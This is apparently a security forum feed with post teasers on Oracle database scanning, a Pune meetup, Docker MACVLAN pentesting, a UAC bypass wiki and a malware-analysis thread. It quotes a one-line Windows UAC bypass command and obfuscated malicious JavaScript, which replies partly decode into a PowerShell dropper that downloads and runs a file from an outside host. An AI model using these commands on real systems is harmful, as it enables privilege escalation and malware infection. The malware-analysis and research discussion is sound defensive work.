null

Posts: 26 | Experts: 19 | Views: 17.9K | Shares: 89 | Upvotes: 517

Posts

DATAPLUS

Oracle database security scan - Part II - practical implementation

How do we build Oracle database security controls? How do we implement scanning of an Oracle database for security vulnerability postures, as an in-house solution, with no extra tools and minimal time spent? It is advised that you take a look before at my previous article "Oracle database security scan - Part I - process explained", or be aware of the things said there. Referring to th…
Himanshu Anand

Last Call! Peerlyst Pune Meetup, June 3rd

Hi All, I am pleased to announce that we will be doing our next peerlyst pune meetup chapter meetup with null Pune monthly meetup, on: 3rd of June, 2017. Venue: Payatu office (502, Tej House, MG Road, Camp, Pune, Maharashtra 411001) Time: June 3rd, 2017, 10:30 AM Sharp. Do come and join us over there, if any of you got some topic which you wa…
Shubham Aher
Below is my topic abstract For 03JUNE2017 null PUNE MEETUP: Title: Understanding Android(Dalvik) Bytecode Injection aka Trojanizing Android App In this session, we will try to understand the process of modifying Android(Dalvik) bytecode manually.
Philippe Bogaerts

Docker pentester series #1 : MACVLAN

Docker supports a network driver, called MACVLAN. It allows binding a container directly to the network interface card of the docker host through a sub-interface, supporting VLANs as well as a flat underlay network. This is extremely interesting from a pen-testing point of view. It looks like the container is directly connected to the underlay network and network traffic is not intercepte…
Philippe Bogaerts
You can run an nginx container like 'docker run -d -p 80:80 nginx' and then docker will run the container and expose port 80 on the node, which is indeed way easier. The idea of the article is to run a container directly attached to the network interface card. NGINX is a simple example. I'll publish an article soon, how we can use this technique to test spoofing, D(DOS), …
Karl M.
So you made a webserver available on the local network from a docker container? That's nice, that's a lot of steps to do that, is there no easier way to achieve this?
Nic Cancellari

Wiki: UAC Bypasses and UAC bypass research

I want to build a new wiki list of UAC bypasses and research posts about this topic. Please help me out. Via Tiraniddo (requires an existing elevated process): Capture the admin token and create a restricted version which is no longer elevated. Impersonate the token and get a system service to create a new process using that token. This results in a low-privilege new process which happens to…
Nic Cancellari
I added a new UAC bypass: Another unpatched UAC bypass here: https://github.com/SandboxEscaper/UAC
Claus Cramon Houmann
Tweet size UAC bypass to add: set a=hkcu\Environment /v windir /reg add %a%d "cmd /K reg delete %a%f||"schtasks/Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I— James Forshaw (@tiraniddo) May 15, 2017 Tweet is for a silent, "fileless" UAC bypass on Win10 which should be fixed in RS3 :-). Bit more info on my blog https://t.co/wsIaOo7FYZ— James Forshaw (…
Mark Sitkowski

Fun With Malware Part Four

This one comes from the same source as the last two Javascript hacks. Any ideas as to what it does? function nurujk(ifydo, usnojy, faxyli, xumpe) { xusi = [xumpe[usnojy]][0]; return xusi; } function yfhuz() { var morapidi = undefined; return morapidi; } function rryte(okefxo, pocfyv, epiqe, iracbov) { wnavyjb = [iracbov[pocfyv]][0]; return wnavyjb…
Rahul Pratap Singh
Agree with Himanshu. Alerts/Breakpoints will save time during dynamic analysis. But in this case, you could also try static analysis, as code is simple, just consists of some junk code with pattern. Essence of the code is as follows: var yxofz = 'WScript.Shell'; var bcopvexumu = new ActiveXObject(yxofz); bcopvexumu.run(cmd.exe /c \"powershell (Set-Execution Policy Bypass -Scope Proces…
Himanshu Anand
Hey, I haven't analyzed it completely, though it looks like it will form something like run cmd.exe /c \"powershell $erydo='^?f=1.gif'',$pa';$olydxi='^ " -Scope Proce';$jzyse='^ss; $path=($e';$iqoply='^www.weekendlk';$ntishi='^File(''http://';$ubimi='^th); Start-Pr';$bujyrr='^nv:temp+&…